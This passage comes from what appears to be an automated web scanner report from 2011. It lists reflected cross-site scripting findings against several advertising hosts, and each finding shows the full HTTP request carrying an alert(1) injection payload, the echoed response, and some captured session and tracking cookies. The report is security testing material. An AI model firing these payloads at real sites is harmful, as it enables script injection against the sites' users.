Date: Sat, 29 Jan 2011 05:20:02 GMT
Expires: Sat, 29 Jan 2011 05:20:02 GMT
Connection: close

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/w;235520565;0-0;0;44779888;255-0/0;40442340/40460127/1;;~okv=;19073'-alert(1)-'0b09bb6dee0=1;~aopt=2/0/ef/0;~sscs=%3fhttp://www.ntta.org/">
...[SNIP]...

4.134. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net.57389.9231.302br.net
Path:	/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cc84"-alert(1)-"f176a4fef5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsi/adi9cc84"-alert(1)-"f176a4fef5c/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=342128F502247A5E0A2B3E23143AA362; Path=/
Content-Type: text/html
Content-Length: 7197
Date: Sat, 29 Jan 2011 01:55:07 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome",
   adsafeSrc : "http://ad.doubleclick.net.57389.9231.302br.net/fw/adi9cc84"-alert(1)-"f176a4fef5c/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925",
   adsafeSep : "?",
   req
...[SNIP]...

4.135. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net.57389.9231.302br.net
Path:	/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5ce1"-alert(1)-"42b69e5e783 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsi/adi/N4682.132309.BURSTMEDIAa5ce1"-alert(1)-"42b69e5e783/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A1FD6EEE9A8663932F7BDCC831DC7153; Path=/
Content-Type: text/html
Content-Length: 7197
Date: Sat, 29 Jan 2011 01:55:08 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome",
   adsafeSrc : "http://ad.doubleclick.net.57389.9231.302br.net/fw/adi/N4682.132309.BURSTMEDIAa5ce1"-alert(1)-"42b69e5e783/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925",
   adsafeSep : "?",
   requrl : "",
   reqquery : ""
...[SNIP]...

4.136. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net.57389.9231.302br.net
Path:	/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0ee1"-alert(1)-"bd76f740cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7a0ee1"-alert(1)-"bd76f740cf;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9F66F5B713694023D3CE9D57322BE3AC; Path=/
Content-Type: text/html
Content-Length: 7196
Date: Sat, 29 Jan 2011 01:55:08 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome",
   adsafeSrc : "http://ad.doubleclick.net.57389.9231.302br.net/fw/adi/N4682.132309.BURSTMEDIA/B4421704.7a0ee1"-alert(1)-"bd76f740cf;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug :
...[SNIP]...

4.137. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net.57389.9231.302br.net
Path:	/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11090"-alert(1)-"5cd4535793b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?&11090"-alert(1)-"5cd4535793b=1 HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5127D245BC3250ACF31540E5AF36C9C9; Path=/
Content-Type: text/html
Content-Length: 7201
Date: Sat, 29 Jan 2011 01:55:06 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Midd
...[SNIP]...
9.9231.302br.net/fw/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?&11090"-alert(1)-"5cd4535793b=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) ===========
...[SNIP]...

4.138. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net.57389.9231.302br.net
Path:	/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload facb6"-alert(1)-"b1f9c18d965 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?facb6"-alert(1)-"b1f9c18d965 HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CBEEFDB089EB7BC4DEF5E5E91E7C4697; Path=/
Content-Type: text/html
Content-Length: 7198
Date: Sat, 29 Jan 2011 01:55:06 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Midd
...[SNIP]...
89.9231.302br.net/fw/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?facb6"-alert(1)-"b1f9c18d965",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) =============
...[SNIP]...

4.139. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net.57390.9231.302br.net
Path:	/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5169"-alert(1)-"6db9eb136ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jss/adjc5169"-alert(1)-"6db9eb136ba/N4682.132309.BURSTMEDIA/B4421704.7 HTTP/1.1
Host: ad.doubleclick.net.57390.9231.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=52485E91EC42E968E3BD3A7776779500; Path=/
Content-Type: text/javascript
Content-Length: 6820
Date: Sat, 29 Jan 2011 05:20:30 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
   adsafeSrc : "http://ad.doubleclick.net.57390.9231.302br.net/fw/adjc5169"-alert(1)-"6db9eb136ba/N4682.132309.BURSTMEDIA/B4421704.7",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false"
};

// use closure to keep out of global namespace
(function() {

   /* ===========================
...[SNIP]...

4.140. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net.57390.9231.302br.net
Path:	/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88a12"-alert(1)-"4fefc518825 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jss/adj/N4682.132309.BURSTMEDIA88a12"-alert(1)-"4fefc518825/B4421704.7 HTTP/1.1
Host: ad.doubleclick.net.57390.9231.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7D54379AD5454BE506B7140F745360AC; Path=/
Content-Type: text/javascript
Content-Length: 6820
Date: Sat, 29 Jan 2011 05:20:31 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
   adsafeSrc : "http://ad.doubleclick.net.57390.9231.302br.net/fw/adj/N4682.132309.BURSTMEDIA88a12"-alert(1)-"4fefc518825/B4421704.7",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false"
};

// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) ==
...[SNIP]...

4.141. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net.57390.9231.302br.net
Path:	/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e5d1"-alert(1)-"6727e37c905 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jss/adj/N4682.132309.BURSTMEDIA/B4421704.72e5d1"-alert(1)-"6727e37c905 HTTP/1.1
Host: ad.doubleclick.net.57390.9231.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6C3A37B834F620543E1586EF494A62CC; Path=/
Content-Type: text/javascript
Content-Length: 6820
Date: Sat, 29 Jan 2011 05:20:31 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
   adsafeSrc : "http://ad.doubleclick.net.57390.9231.302br.net/fw/adj/N4682.132309.BURSTMEDIA/B4421704.72e5d1"-alert(1)-"6727e37c905",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false"
};

// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) =============
...[SNIP]...

4.142. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [abr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net.57390.9231.302br.net
Path:	/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of the abr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc3cc"-alert(1)-"89837e3663b was submitted in the abr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7;abr=!ie;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?dc3cc"-alert(1)-"89837e3663b HTTP/1.1
Host: ad.doubleclick.net.57390.9231.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CB04512BF419206D1DEA473C1878274B; Path=/
Content-Type: text/javascript
Content-Length: 6970
Date: Sat, 29 Jan 2011 05:20:27 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
   adsafeSrc : "http://ad.doubleclick.net.57390.9231.302br.net/fw/adj/N4682.132309.BURSTMEDIA/B4421704.7;abr=!ie;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?dc3cc"-alert(1)-"89837e3663b",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) =============
...[SNIP]...

4.143. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net.57390.9231.302br.net
Path:	/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 881c8"-alert(1)-"8139a7defa5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7?881c8"-alert(1)-"8139a7defa5=1 HTTP/1.1
Host: ad.doubleclick.net.57390.9231.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7E827396F7BF67C1E502BB2D40424D9B; Path=/
Content-Type: text/javascript
Content-Length: 6834
Date: Sat, 29 Jan 2011 05:20:27 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
   adsafeSrc : "http://ad.doubleclick.net.57390.9231.302br.net/fw/adj/N4682.132309.BURSTMEDIA/B4421704.7?881c8"-alert(1)-"8139a7defa5=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) ===========
...[SNIP]...

4.144. http://ad.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97cc9"><script>alert(1)</script>2c0fb4b63c9 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=97cc9"><script>alert(1)</script>2c0fb4b63c9 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15001%7C15001%7C15001%7C15001%7C15001%7C15002%7C15002%7C14983%7C15002; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 16:37:16 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 16:37:16 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=3895982606775233875&fpid=97cc9"><script>alert(1)</script>2c0fb4b63c9&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.145. http://ads.adxpose.com/ads/ads.js [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adxpose.com
Path:	/ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload d1f6b<script>alert(1)</script>6ed7f121a0a was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=7hSy8PbjRnOXSf2i_40364845d1f6b<script>alert(1)</script>6ed7f121a0a HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6607FF9B548A802C9DD6B8C4F5986A9A; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 16:37:19 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_7hSy8PbjRnOXSf2i_40364845d1f6b<script>alert(1)</script>6ed7f121a0a".replace(/[^\w\d]/g,""),"7hSy8PbjRnOXSf2i_40364845d1f6b<script>
...[SNIP]...

4.146. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f28b8"-alert(1)-"6a97e4dd9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1603038&f28b8"-alert(1)-"6a97e4dd9a=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:56:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 29 Jan 2011 01:56:11 GMT
Pragma: no-cache
Content-Length: 4633
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&f28b8"-alert(1)-"6a97e4dd9a=1&s=1603038&_salt=4229063232";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

4.147. http://ads.roiserver.com/tag.jsp [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.roiserver.com
